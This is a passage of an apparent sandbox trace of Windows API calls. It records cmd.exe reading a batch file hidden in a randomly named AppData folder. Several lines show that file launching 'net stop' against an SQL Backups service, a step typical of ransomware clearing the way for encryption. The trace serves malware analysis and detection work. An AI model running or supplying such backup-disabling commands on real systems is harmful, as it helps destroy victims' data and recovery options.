lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x4a4, dwThreadId=0x64)) returned 1 [0214.417] CloseHandle (hObject=0x78) returned 1 [0214.417] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.417] GetProcessHeap () returned 0x3e0000 [0214.417] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.417] GetEnvironmentStringsW () returned 0x3f8408* [0214.417] GetProcessHeap () returned 0x3e0000 [0214.417] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.418] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.418] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0214.546] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0214.546] CloseHandle (hObject=0x74) returned 1 [0214.546] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0214.546] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0214.547] GetProcessHeap () returned 0x3e0000 [0214.547] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.547] GetEnvironmentStringsW () returned 0x3f8408* [0214.547] GetProcessHeap () returned 0x3e0000 [0214.547] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.547] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.547] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.547] GetProcessHeap () returned 0x3e0000 [0214.547] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.547] GetEnvironmentStringsW () returned 0x3f8408* [0214.547] GetProcessHeap () returned 0x3e0000 [0214.547] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.548] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.548] GetProcessHeap () returned 0x3e0000 [0214.548] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0214.548] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0214.548] _get_osfhandle (_FileHandle=1) returned 0x264 [0214.548] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0214.548] _get_osfhandle (_FileHandle=1) returned 0x264 [0214.548] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0214.548] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0214.548] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0214.548] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0214.548] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0214.549] SetConsoleInputExeNameW () returned 0x1 [0214.549] GetConsoleOutputCP () returned 0x1b5 [0214.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0214.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0214.549] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0214.549] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.549] SetFilePointer (in: hFile=0x74, lDistanceToMove=5489, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1571 [0214.549] GetProcessHeap () returned 0x3e0000 [0214.549] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0214.549] GetProcessHeap () returned 0x3e0000 [0214.549] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0214.549] GetProcessHeap () returned 0x3e0000 [0214.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0214.550] GetProcessHeap () returned 0x3e0000 [0214.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0214.550] GetProcessHeap () returned 0x3e0000 [0214.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0214.550] GetProcessHeap () returned 0x3e0000 [0214.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0214.550] GetProcessHeap () returned 0x3e0000 [0214.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0214.550] GetProcessHeap () returned 0x3e0000 [0214.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0214.550] GetProcessHeap () returned 0x3e0000 [0214.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0214.550] GetProcessHeap () returned 0x3e0000 [0214.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0214.550] GetProcessHeap () returned 0x3e0000 [0214.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0214.550] GetProcessHeap () returned 0x3e0000 [0214.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0214.550] GetProcessHeap () returned 0x3e0000 [0214.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0214.550] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.550] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1571 [0214.550] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x350, lpOverlapped=0x0) returned 1 [0214.550] SetFilePointer (in: hFile=0x74, lDistanceToMove=5520, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1590 [0214.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=31, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£SQL BackupsΓÇ¥ /y\r\n/y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 31 [0214.551] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.551] GetFileType (hFile=0x74) returned 0x1 [0214.551] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.551] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1590 [0214.551] GetProcessHeap () returned 0x3e0000 [0214.551] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0214.551] GetProcessHeap () returned 0x3e0000 [0214.551] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0214.554] _tell (_FileHandle=3) returned 5520 [0214.554] _close (_FileHandle=3) returned 0 [0214.554] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0214.554] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0214.554] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0214.554] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0214.554] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0214.555] _wcsicmp (_String1="net", _String2="CD") returned 11 [0214.555] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0214.555] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0214.555] _wcsicmp (_String1="net", _String2="REN") returned -4 [0214.555] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0214.555] _wcsicmp (_String1="net", _String2="SET") returned -5 [0214.555] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0214.555] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0214.555] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0214.555] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0214.555] _wcsicmp (_String1="net", _String2="MD") returned 1 [0214.555] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0214.555] _wcsicmp (_String1="net", _String2="RD") returned -4 [0214.555] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0214.555] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0214.555] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0214.555] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0214.555] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0214.555] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0214.555] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0214.555] _wcsicmp (_String1="net", _String2="VER") returned -8 [0214.555] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0214.555] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0214.555] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0214.555] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0214.555] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0214.555] _wcsicmp (_String1="net", _String2="START") returned -5 [0214.555] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0214.555] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0214.555] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0214.555] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0214.555] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0214.555] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0214.555] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0214.555] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0214.555] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0214.555] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0214.556] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0214.556] SetErrorMode (uMode=0x0) returned 0x1 [0214.556] GetProcessHeap () returned 0x3e0000 [0214.556] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0214.556] GetProcessHeap () returned 0x3e0000 [0214.556] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0214.556] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.556] GetProcessHeap () returned 0x3e0000 [0214.556] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0214.557] GetProcessHeap () returned 0x3e0000 [0214.557] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0214.557] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0214.557] GetProcessHeap () returned 0x3e0000 [0214.557] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0214.557] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.557] GetProcessHeap () returned 0x3e0000 [0214.557] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0214.557] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0214.557] GetProcessHeap () returned 0x3e0000 [0214.557] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0214.558] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.558] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.558] GetLastError () returned 0x2 [0214.559] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.559] GetLastError () returned 0x2 [0214.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.560] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0214.560] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.560] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.560] GetLastError () returned 0x2 [0214.561] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0214.561] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.561] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.562] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0214.562] SetErrorMode (uMode=0x0) returned 0x1 [0214.562] GetProcessHeap () returned 0x3e0000 [0214.562] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0214.562] GetProcessHeap () returned 0x3e0000 [0214.562] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0214.562] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.562] GetProcessHeap () returned 0x3e0000 [0214.562] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0214.562] GetProcessHeap () returned 0x3e0000 [0214.562] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0214.563] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0214.563] GetProcessHeap () returned 0x3e0000 [0214.563] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0214.563] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.563] GetProcessHeap () returned 0x3e0000 [0214.563] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0214.563] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0214.563] GetProcessHeap () returned 0x3e0000 [0214.563] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0214.564] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.564] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.564] GetLastError () returned 0x2 [0214.565] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.565] GetLastError () returned 0x2 [0214.565] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.566] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0214.566] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0214.566] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.566] GetLastError () returned 0x2 [0214.567] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0214.567] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0214.567] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.567] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0214.567] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0214.568] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0214.568] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.568] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£SQL BackupsΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£SQL BackupsΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£SQL BackupsΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x7b8, dwThreadId=0x588)) returned 1 [0214.572] CloseHandle (hObject=0x74) returned 1 [0214.572] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.572] GetProcessHeap () returned 0x3e0000 [0214.572] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.572] GetEnvironmentStringsW () returned 0x3f8408* [0214.572] GetProcessHeap () returned 0x3e0000 [0214.572] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.572] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.572] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0214.715] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0214.715] CloseHandle (hObject=0x78) returned 1 [0214.715] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0214.715] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0214.715] GetProcessHeap () returned 0x3e0000 [0214.716] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.716] GetEnvironmentStringsW () returned 0x3f8408* [0214.716] GetProcessHeap () returned 0x3e0000 [0214.716] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.716] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.716] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.716] GetProcessHeap () returned 0x3e0000 [0214.716] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.716] GetEnvironmentStringsW () returned 0x3f8408* [0214.716] GetProcessHeap () returned 0x3e0000 [0214.716] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.717] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.717] GetProcessHeap () returned 0x3e0000 [0214.717] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0214.717] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0214.717] _get_osfhandle (_FileHandle=1) returned 0x264 [0214.717] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0214.717] _get_osfhandle (_FileHandle=1) returned 0x264 [0214.717] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0214.717] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0214.717] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0214.717] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0214.717] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0214.718] SetConsoleInputExeNameW () returned 0x1 [0214.718] GetConsoleOutputCP () returned 0x1b5 [0214.718] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0214.718] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0214.718] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0214.718] _get_osfhandle (_FileHandle=3) returned 0x78 [0214.718] SetFilePointer (in: hFile=0x78, lDistanceToMove=5520, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1590 [0214.718] GetProcessHeap () returned 0x3e0000 [0214.718] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0214.718] GetProcessHeap () returned 0x3e0000 [0214.718] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0214.718] GetProcessHeap () returned 0x3e0000 [0214.718] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0214.719] GetProcessHeap () returned 0x3e0000 [0214.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0214.719] GetProcessHeap () returned 0x3e0000 [0214.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0214.719] GetProcessHeap () returned 0x3e0000 [0214.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0214.719] GetProcessHeap () returned 0x3e0000 [0214.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0214.719] GetProcessHeap () returned 0x3e0000 [0214.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0214.719] GetProcessHeap () returned 0x3e0000 [0214.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0214.719] GetProcessHeap () returned 0x3e0000 [0214.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0214.719] GetProcessHeap () returned 0x3e0000 [0214.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0214.719] GetProcessHeap () returned 0x3e0000 [0214.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0214.719] GetProcessHeap () returned 0x3e0000 [0214.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0214.719] _get_osfhandle (_FileHandle=3) returned 0x78 [0214.719] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1590 [0214.719] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x331, lpOverlapped=0x0) returned 1 [0214.719] SetFilePointer (in: hFile=0x78, lDistanceToMove=5543, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15a7 [0214.719] 